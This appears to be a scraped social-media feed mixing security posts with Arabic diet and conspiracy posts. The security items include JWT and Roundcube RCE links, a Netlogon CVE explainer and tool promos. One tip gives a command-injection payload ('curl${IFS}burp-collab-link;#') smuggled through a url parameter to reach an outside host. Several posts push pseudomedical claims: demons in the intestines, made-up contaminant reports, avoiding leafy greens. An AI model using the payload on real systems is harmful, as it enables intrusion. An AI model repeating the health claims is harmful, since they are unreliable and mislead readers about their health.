I wrote an article: 10 ways to exploit JSON Web Token (JWT) lnkd.in/dF5_kmBs And I uploaded a video on my YouTube channel, solved CTF challenge about JWT lnkd.in/dhthAwX5 Happy Hacking. #jwt #jwt_security #websecurity #cybersecurity #infosec #ctf #bugbounty

Critical RCE in Roundcube 🤯🔥 Your inbox could be the attack vector. CVE-2025-49113 allows Remote Code Execution on vulnerable Roundcube instances, putting countless email servers at risk. 🚨 👨‍💻 AirCorridor / Hackers-Arise 🔗 hackers-arise.com/critical-r… #CyberSecurity #RCE

مقاومة التجديد تجربة البروفيسور نوكس قوبلت بالرفض وهوجم بشراسة لأنه قال: - شرب الماء عند العطش فقط! وأيضا هو الذي طبق الحمية عالية الدهون، بدلا عن الحمية عالية الكاربوهيدرات فنجحت وعالجت الكثير من المشاكل الصحية. هل يذكرنا هذا بشيء يحدث الآن؟

$2,500 Bug Bounty 🤑 "How I Took Over Any Account on a Major Platform With One Click — A Client-Side Path Traversal Story" by patrickbatman 🤯🔥 👨‍💻 patrickbatman (x/hamidonsolo) 🔗 patrickbatman.hashnode.dev/h… 🔗t.me/luckyhacker43

أداة ParamStriker تستحق التجربه وننتظر ارائكم فيها بس عطها Raw json واستمتع بالنتايج

أكيد سمعتوا الأسبوع الماضي عن ثغرة Netlogon من مايكروسوفت (CVE-2026-41089) بشرح في هالتغريدة الخدمة المصابة، وش خطورة الثغرة، وليش لازم تتحدث بسرعة. 📍 وش هي Netlogon؟ ببساطة، Netlogon هي الخدمة المسؤولة عن عملية “الثقة” بين الأجهزة والـ (Domain Controller) في بيئة (Active Directory). تخيلها مثل حارس أمن في مبنى. كل ما جا موظف، يتأكد من بطاقته، يسجل دخوله، ويتأكد إنه فعلاً من ضمن الشركة. هذي تقريباً وظيفة Netlogon في عالم ويندوز. شغلها الفعلي يشمل: 🔹 تأكيد هوية المستخدمين والأجهزة لما يسجلون دخول 🔹 إدارة حسابات الثقة للأجهزة (Machine Trust Accounts) 🔹 الحفاظ على العلاقة بين الجهاز والـ (Domain Controller) 🔹 إدارة قنوات الاتصال المؤمنة بين الأجهزة والـ (DC) 🔹 دعم علاقات الثقة بين الـ (Domain Controllers) والدومينات لو هذي الخدمة تعطلت أو اخترقت، بتتاثر كامل بيئة (Active Directory). 📍 البروتوكول اللي يستخدمه Netlogon هو (Microsoft Netlogon Remote Protocol) MS-NRPC هذا البروتوكول يستخدم (RPC) للتواصل بين الأجهزة والـ (Domain Controller). وغالباً يظهر عبر: 🔹 منفذ 135 الخاص بـ (RPC Endpoint Mapper) 🔹 أو (RPC over SMB) عبر منفذ 445 حسب البيئة 📍 الثغرة الجديدة CVE-2026-41089 مايكروسوفت أعلنت عنها يوم 12 مايو 2026 ضمن تحديثات (Patch Tuesday). تقييمها: (CVSS) 9.8 من 10 نوع الثغرة: (Stack-based Buffer Overflow) في خدمة Netlogon. يعني فيه خلل في طريقة تعامل الخدمة مع بيانات قادمة عبر الشبكة. إذا أرسل المهاجم بيانات مصممة بطريقة معينة، ممكن يصير تجاوز في الذاكرة يؤدي إلى تنفيذ كود عن بعد. 📍 وش معنى Stack-based Buffer Overflow؟ ببساطة، البرنامج لما يستقبل بيانات من الشبكة، يحطها في مساحة محددة داخل الذاكرة اسمها (Stack). تخيلها مثل رف صغير مخصص لكمية معينة من الملفات. لو المهاجم أرسل بيانات أكبر من المساحة المتوقعة، البيانات الزائدة ممكن تكتب فوق أجزاء ثانية في الذاكرة. في بعض الحالات، هذا النوع من الأخطاء يسمح بتغيير مسار تنفيذ البرنامج وتشغيل أوامر غير متوقعة. مو كل (Buffer Overflow) سهل استغلاله، لأن الأنظمة الحديثة فيها حمايات، لكنه يظل من أخطر أنواع ثغرات الذاكرة. 📍 سبب خطورة الثغرة ما تحتاج تسجيل دخول (Unauthenticated) يعني المهاجم ما يحتاج يكون عنده حساب ولا كلمة مرور. ما تحتاج تفاعل من المستخدم (No User Interaction) ما تحتاج أحد يضغط على رابط أو يفتح ملف. تشتغل عن بعد (Remote) إذا المهاجم يقدر يوصل للـ (Domain Controller) عبر الشبكة، معناته يقدر يستغل الثغرة ( نظرياً حتى الان) تعقيد الاستغلال منخفض حسب تقييم (CVSS) 📍 الأنظمة المتأثرة كل إصدارات (Windows Server) التي تعمل كـ (Domain Controller) ضمن الإصدارات المتأثرة: 🔹 Windows Server 2012 / 2012 R2 🔹 Windows Server 2016 🔹 Windows Server 2019 🔹 Windows Server 2022 🔹 Windows Server 2025 📍 مقارنة مع Zerologon CVE-2020-1472 كثير قارنوها بثغرة (Zerologon) الشهيرة. الفرق التقني مهم: 🔹 Zerologon كانت ثغرة في تصميم التشفير داخل بروتوكول Netlogon (Cryptographic flaw) 🔹 CVE-2026-41089 ثغرة في معالجة الذاكرة (Memory Corruption) Zerologon كانت أسهل نسبياً في الاستغلال لأنها قائمة على عيب تشفيري واضح. أما الثغرة الحالية فتحتاج بناء (Exploit) لـ (Buffer Overflow)، وهذا أصعب تقنياً، لكنه مو مستحيل. الاختلاف في التقنية، لكن القاسم المشترك هو: الخطر على الـ (Domain Controller) بدون تسجيل دخول. 📍 مايكروسوفت قالت ان احتمالية الاستغلال بأنها “أقل احتمالاً” Exploitation Less Likely ✋ لكن لا تبني قرارك الأمني على هذي العبارة وحدها اصلا من يثق في ماتقول مايكروسفت؟ حتى لو ما فيه استغلال علني حالياً، تجاهل التحديث مخاطرة غير منطقية. خصوصاً إن الثغرات اللي تمس خدمات حساسة مثل Netlogon تتحول غالباً لهدف جذاب للباحثين والمهاجمين. اتمنى ان التغريده كانت مفيده وممتعه

فيديو يوضح طريقة استغلال الثغرة في مساعد Meta AI تتيح إعادة تعيين كلمات مرور الإنستقرام @instagram

#نظام_الطيبات_أسلوب_حياة 🔥 زلزال الوعي: هل كان الدكتور ضياء العوضي يعلم بسرّ تقرير ٢٠١٧ المرعب؟ أم أنه كان يصرخ في الوادي وحده؟ 🛡️🦅 يا أحرار جيش الوعي.. طالما تكرر السؤال التاريخي في عقول الملايين: "لماذا كان الدكتور ضياء العوضي يشن حرباً شرسة على أطعمة أصلها حلال؟ لماذا يمنع الدجاج والخضروات والمنتجات المصنعة؟".. ظنّ البسطاء يومها أنها مجرد "تشدد غذائي"، بينما كانت المنظومة تخفي الجريمة الأكبر في تاريخ البشرية البيولوجي! اليوم، نكشف لكم من واقع أبحاثنا الممتدة في كتابنا [الحق المبين في كشف أسرار الشياطين] شفرات الخديعة.. وثائق رسمية وروايات صادمة تثبت أن المؤامرة أكبر مما تتخيلون. 🚨 المحطة الأولى: الصدمة الكبرى.. تقرير ٢٠١٧ الرسمي (الملف الأسود المحظور!) في عام ٢٠١٧، اهتزت الأسواق الدولية بعد تقارير رسمية صادمة من هيئة الغذاء والدواء الأمريكية (FDA) ومركز السيطرة على الأمراض (CDC) فرضت بموجبها دول عديدة حظراً شاملاً على شحنات غذائية وزراعية كشفت عن كوارث بيولوجية: فواكه ومربات ملوثة بفيروس الكبد الوبائي نتيجة ري المزارع بمياه الصرف الصحي (بقايا فضلات آدمية ومجاري). أجبان معلبة (كالفيتا) تحتوي على الفورمالين (مادة حفظ جثث الموتى) وبكتيريا عنقودية مرعبة تفرز سموماً تضرب الشبكة العصبية والعصب الحائر لتعطيل كهرباء الجسد! خضروات مجمدة بمبيدات حشرية محظورة دولياً ومسرطنة. أرز أبيض يُبيض بالجير الكيميائي (المستخدم في البلاط)! ⚠️ المحطة الثانية: كيف بدأت المكيدة؟ العودة إلى فبراير ٢٠٠٦ (إبادة السلالات الربانية) لكي تفهموا ترابط الخيوط الذي نؤصله في سلسلة [الحق المبين]، لابد أن نتذكر ما حدث تحت شعار "إنفلونزا الطيور" عام 2006.. حين تم استغفال الأمة وإعدام أكثر من 34 مليون طائر بلدي! يومها قال رئيس الوزراء الأسبق أحمد نظيف صراحة: "العالم يتجه نحو المزارع الكبيرة؛ لأنها يمكن السيطرة عليها.. حان الوقت للتخلص من فكرة تربية الدجاج على أسطح المنازل". النتيجة الكارثية كانت: انهيار السلالات الربانية الطبيعية ذات المناعة الصلبة، وخسارة مليون عامل لوظائفهم، وإجبار الشعوب على استهلاك "الدجاج الهجين" المحقون بالهرمونات والمبيدات والسموم.. سلالات ممسوخة صُممت خصيصاً لتدمير جدار أمعائكم! باختصار: منعوا عنكم الطيبات الربانية في 2006، ليُجبروكم على استهلاك السموم الملوثة بالبكتيريا وفضلات المجاري في 2017! 🧠 وهنا تتصل الحبيبات.. وتظهر الحقيقة في [الحق المبين] نحن لا نُرعب الناس، بل نوقظ الوعي. كل ما ذكرناه في تقارير 2017 كان عن المنتجات "المُصَدَّرَة" – التي يُفترض أنها الأعلى جودة وفحصاً.. فما بالكم بالمنتجات المحلية التي تصل إلى بطونكم دون رقيب؟! وتفسير هذه الكوارث البيولوجية نكشفه في [الحق المبين في كشف أسرار الشياطين]؛ الدكتور ضياء العوضي لم يكن يمنع الدجاج والمنتجات لأنها حرام، بل لأن المنظومة لوثتها لتتحول أمعاؤكم الغليظة إلى مستنقع كبريتي حار ورطب (وهو طعام الشيطان المفضل وبيئته للتكاثر)، لتنطلق قذائف الاستحواذ الثلاثية في أجسادكم: هَمْزُهُ: العبث بالإشارات العصبية (بفعل سموم البكتيريا العنقودية) ليحدث الوسواس والصرع والاكتئاب. نَفْخُهُ: الغازات الكبريتية والانتفاخات وضيق التنفس (الخنقة). نَفْثُهُ: خروج الريح الحار المحمل بالأجنة والبيوض المؤذية. الحرص واجب، والوعي سلاح، والأدلة أمامكم والخلل المعوي هو بوابة الاختراق! #ضياءالعوضي #زلزال_الوعي #أحمد_حلمي #غزة_تموت_جوعا

INFOFINDER_PRO — OSINT Toolkit for Email, Username & Phone Intelligence 💀🔥 A Python-based OSINT tool designed for investigators, threat hunters, and cybersecurity professionals who need quick visibility into a target's digital footprint. Key capabilities: 📧 Email Intelligence • Email validation & MX record checks • Disposable email detection • HaveIBeenPwned breach lookup • Gravatar profile discovery • GitHub account discovery • Hunter.io email verification support • Paste exposure checks 🌐 Username Investigation • Social media username enumeration • Cross-platform profile discovery • Digital footprint collection 📱 Phone Number Intelligence • Carrier identification • Geolocation insights • Timezone detection • Number validation • OSINT-focused Google dork generation 📊 Reporting & Visualization • PDF and CSV report generation • Entity relationship graphing • Color-coded investigation output • Structured intelligence reporting Useful for: • Threat Intelligence • OSINT investigations • Identity verification • Breach exposure analysis • Social engineering assessments • Incident response support • Digital footprint mapping Tech Stack: Python • DNS Analysis • NetworkX • ReportLab • Phonenumbers • BeautifulSoup • OSINT APIs ⚠️ Designed for authorized security research, investigations, and educational use. 🔗 github.com/techenthusiast167… #OSINT #ThreatIntelligence #CyberSecurity #DigitalForensics #InfoSec #SOC #BlueTeam

This article on JavaScript analysis for pentesters is a solid walkthrough of: • endpoint extraction • hidden routes • dangerous DOM sinks • framework-specific attack surfaces • client-side recon methodology Worth reading if you're into client-side bug bounty hunting: kpwn.de/posts/javascript-ana… #bugbounty #websecurity #javascript #infosec #appsec #pentesting

بعض المحاربين لنظام الطيبات تجدهم غير مقتنعين بأسلوب الدكتور ضياء العوضي في آخر سنه في حياته. تلك السنة التي خاض فيها العديد من المعارك مع نقابة الاطباء حتى اجمعوا امرهم بينهم وكادوا كيدهم وفصلوه من الطب وشطبوا شهاداته وكأنه طالب بالمرحلة الابتدائية وليس استشاري واستاد دكتور. ثم أغلقوا عيادته ومنعوه من العمل بالمجال الطبي. ذلك الشطب التعسفي لشهادات متفوق مع مرتبة الشرف كفيلاً بإدخال الإنسان المصحة العقلية فضلاً عن تغير اسلوبه.. فلو كان ضياء العوضي جبلاً كان قد انهدّ حجراً حجرا. فلا غرابة لدى كل عاقل ان يتغير اسلوب الشخص في الكلام وانتهاجه اسلوباً حاداً في النقاش نتيجة الظلم الذي وقع عليه. # شاهدوا بالفيديو المرفق واسلوبه قبل الشطب والمعارك التي خاضها مع نقابة الاطباء. ستعرفون حينها لماذا قال الله تعالى في الحديث القدسي ( ياعبادي إني حرمت الظلم على نفسي وجعلته بينكم محرما) قاتل الله الظلم فهو أقوى من وقع السيوف على كاهل المظلوم. #ضياء_العوضى #الطيبات #الأردن #مصر #السعودية #العراق #الامارات #ايران #اليمن #السكري #الضغط #الكويت_الآن #عمان #ترامب_يهدد_سلطنة_عمان

٢٤ ثانية. فتاة قالت "أنا غبية شوي" لكنها كسبت ٢٠ ألف دولار من قناة ما ظهر فيها وجهها قط. كيف؟ فتحت YouTube، لقطت برنامج أطفال مشاهداته ملايين، نسخت التفريغ، لصقته لـ Claude، طلبت منه يكتب سيناريو مشابه. النتيجة: فيديو جاهز يرفع على اليوتيوب كل يوم لمدة شهر. اللي يستحق التوقف: مو الذكاء، بل إنك تلعب لعبة بآلية التوزيع نفسها. AI ما يكسبك فلوس لأنه أذكى، يكسبك لأنه يكرّر اللي already works بسرعة جنونية. السؤال: إذا كانت "الغبية" حققت ٢٠k، وش يقدر يحقق اللي يفهم؟

⚠️ المخ الثاني، الشفرة التي أخفاها إبليس في أمعائك ولم يكملها : د. ضياء العوضي! لماذا بدأ الشيطان حربه مع آدم بـ "أكلة"؟ ولماذا يصر العالم اليوم على تحويل طعامك إلى "هندسة كيميائية الحقيقة ليست في كتب التغذية بل في صراع قديم على "السيادة" داخل جسدك. --- الشفرة الأولى لغز "الصلصال" والجسد النوراني إبليس درس جسد آدم وهو صلصال، واكتشف الثغرة العصب الحائر هذا العصب هو "الجسر" الذي يربط القناة الهضمية بالمخ مباشرة. بـ "الأكلة الأولى حوّل إبليس جسد آدم من حالته النورانية إلى جسد مادي يحتاج للإخراج وتنشط فيه الغرائز، فانكشفت السوءات. كانت تلك أول عملية "تغيير لخلق الله" عبر بوابة المعدة. --- "المعدة هي القاعدة العسكرية (المخ الثاني) هل تعلم أن الجنين يُخلق فيه الجهاز العصبي والهضمي من نفس النسيج؟ لذا تُسمى الأمعاء "المخ الثاني". - خديعة السيروتونين: 90% من هرمون السعادة لا يُصنع في رأسك، بل في أمعائك الاستحواذ البكتيري تسكن في أمعائك تريليونات الكائنات (الميكروبيوم) الشيطان يدعم "البكتيريا الضارة" التي تتغذى على السكر والدقيق.وعندما تتكاثر، تصبح هي التي تطلب منك الأكل (إدمان السكر) وهنا يحدث الاستحواذ الغذائي؛ حيث تصبح رغباتك مجرد أوامر من كائنات يسكنها الشيطان. --- تنفيذ الوعد: شياطين الإنس" وهندسة الدم قال إبليس: ﴿وَلَآمُرَنَّهُمْ فَلَيُغَيِّرُنَّ خَلْقَ اللَّهِ﴾ اليوم، تنفذ شركات الأغذية هذا الوعد بدقة - تزوير القمح: رفعوا الجلوتين 50 ضعفاً ليتحول لغراء يخنق القولون. - مسخ الدجاج حوّلوا "البلدي" لكتل هرمونية تنضج في 40 يوماً لضرب هرموناتك. - السموم البيضاء سكر وزيوت مهدرجة ترفع حموضة الدم.سحب المعادن: الطعام المهندس ليس فقط "مضافاً إليه سموم بل هو منزوع منه الروح سحبوا منه (المغنيسيوم والزنك) وهي المعادن المسؤولة عن "السكينة" و"الثبات الانفعالي واستبدلوها بمواد كيميائية تجعل عقلك في حالة "ضجيج مستمر" لا تستطيع معه الخشوع في صلاة أو تركيز في هدف. جريان الشيطان النبي ﷺ قال إنَّ الشَّيْطانَ يَجْرِي مِنَ الإنسانِ مَجْرَى الدَّمِ». الدم العكر بالسموم هو "الطريق السريع" الذي يسهل وسوسة الشيطان بينما الدم النقي من الطيبات يضيق عليه المجاري. --- العصب الحائر.. طريق "النفاثات في العقد" عندما تأكل "الطعام المهندس"، تلتهب الأمعاء وتتعفن فتتحول لبيئة قذرة (المقر المفضل للشياطين). 1. يرسل العصب الحائر إشارات اضطراب للمخ. 2. ينخفض السيروتونين (السعادة) ويرتفع الكورتيزول التوتر 3. يستلم الشيطان هذه الثغرة العصبية "فينفث في العقد فتصاب بالوسواس والقلق وضيق الصدر الذي يؤدي في النهاية لضعف المروءة أو حتى الانتحار. --- أين توقف ضياء العوضي؟ الدكتور ضياء كشف أهمية "الطيبات كالدهون الحيوانية والزبدة الطبيعية لكن الشفرة الأعمق هي أن إبليس يريدك أن تترك هذه "الدهون" التي تبني الهرمونات الذكرية والأنثوية لتأكل "زيوت المصانع" التي تسبب البرود والوهن لتموت فيك "النخوة والرجولة --- التشفير الجيني: جسدك مبرمج على "كود إلهي" يفهم السمن البلدي وخبز الشعير. عندما تدخل له "كوداً غريباً" (زيوت مهدرجة، صويا معدلة)، يحدث Conflict (تضارب ) في نظامك، هذا التضارب هو ما يفتح الثغرات الطاقية التي ينفذ منها الوسواس. أنت لا تمرض جسدياً فقط، أنت تفقد "اتصالك بأصلك". التحصين الأخير المعركة تبدأ من طبقك. العودة للطعام (البلدي، العضوي، الفطري) ليست "رفاهية بل هي استرداد لسيادتك على عقلك وجسدك. ﴿كُلُوا مِمَّا فِي الْأَرْضِ حَلَالًا طَيِّبًا وَلَا تَتَّبِعُوا خُطُواتِ الشَّيْطَانِ﴾ --- كسر السيطرة ف شفرة الجوع لماذا كان الصيام جُنّة؟ لأن المعدة الفارغة تقطع الإمدادات عن "البكتيريا الشيطانية وتجبر الجسد على استهلاك مخزونه من السموم. الشيطان يريدك "في حالة مضغ مستمر" ليبقي إشارات العصب الحائر مشغولة بالدنيا ومقطوعة عن السماء. الخلاصة الصادمة: هل لاحظت؟ بتشتهي السكر حتى بعد ما تشبع مزاجك بيقع فجأة بدون سبب قلق تفكير زائد قبل النوم خمول بعد الأكل مباشرة دي مش حالة نفسي دي إشارات إن “المعدة بدأت تتحكم من سيطر على معدتك سيطر على هرموناتك ومن سيطر على هرموناتك امتلك قرارك ---

Change your IP every 10 secs automatically

?url= ❌SSRF, ✅RCE if you find a parameter which passing url then, before testing SSRF try to test RCE. 1. bypass: ?url=http://x"; [now add here your blind rce payload] 2. payload: curl${ IFS }burp-collab-link;# Join my BugBounty telegram channel: t.me/SehllSec

لو فاكر إنك بتعرف تستغل Claude صح، فالبوست ده هيصدمك ويفوقك! 🤫 الشركة المطورة نزلت الـمخطط والدليل الرسمي من 33 صفحة، وبتكشف فيه عن أسرار تفعيل الـ Skills اللي هتخلي الـ AI بتاعك يتحول لـ Agent مرعب بيخلص شغلك وأنت نايم! احفظ البوست ده عندك فوراً قبل ما يضيع منك. الدليل ده مش كلام نظري، ده الكتالوج والـ Blueprint الحقيقي اللي بيشرح إزاي توظف قدرات Claude وتطوع الـ Skills بتاعته بأعلى كفاءة عشان ينفذ مهام معقدة كـ Agent حقيقي في البرمجة والـ Automation. دليل مكون من 33 صفحة.. ومجاني.. ومن الشركة اللي صانعة Claude بنفسها. الموضوع مابقاش محتاج تجريب ووقت ضايع في برومبتس عشوائية، الخطوات واضحة ومكتوبة من المهندسين اللي بنوا النموذج نفسه. نصيحة: الدليل ده قيمته أعلى من أي كورس تجاري ممكن تدفع فيه مئات الدولارات. احفظه وشوفه حالاً عشان تسبق الكل وتعرف الليفل المتقدم من الـ AI واصل لفين. رابط الدليل الكامل هتلاقيه في أول تعليق. 👇 لايك وفولو واحفظ البوست عشان يوصلك كل جديد!

Anthropic CEO after watching a $20B Chinese AI founder hand out the exact architecture that beats Claude for free in 40 minutes

لماذا منع الدكتور ضياء العوضي الله يرحمة ويسكنة فسيح جناتة ، تناول الورقيات زي الجرجير والفجل وورق العنب وغيرها من الورقيات ؟؟ 👇🏻 هذا توضيح لخطورة تناولها مع دكتور بيطري يوضح كيف يستطيع الحيوان هضمها وامتصاصها بينما انت لا تستطيع ولا تستفيد منها شيء فيديو يستحق المشاهدة. وليد الزريقي

⚡ scan4all: All-in-one automated vulnerability scanner for red teamers & bug bounty hunters. • Integrates nuclei, subfinder, naabu, ksubdomain & more • 15,000 PoCs 7,000 web fingerprints • Supports weak password checks across 23 protocols • Smart SSL/domain correlation & automated subdomain discovery • Port scan, fuzzing, fingerprinting & vulnerability detection in one tool github.com/GhostTroops/scan4… #BugBounty #Pentesting #RedTeam #CyberSecurity #Recon

⚡ One-Liners for Bug Bounty & Recon Collection of powerful recon and vulnerability hunting one-liners. • Subdomain enum, port scan & live host discovery • XSS, SSRF, SQLi, LFI & SSTI hunting workflows • JS analysis, hidden params & endpoint extraction • Built with tools like httpx, nuclei, ffuf & sqlmap • Useful for automation & bug bounty recon pipelines github.com/dwisiswant0/aweso… #BugBounty #Recon #Pentesting #CyberSecurity #AppSec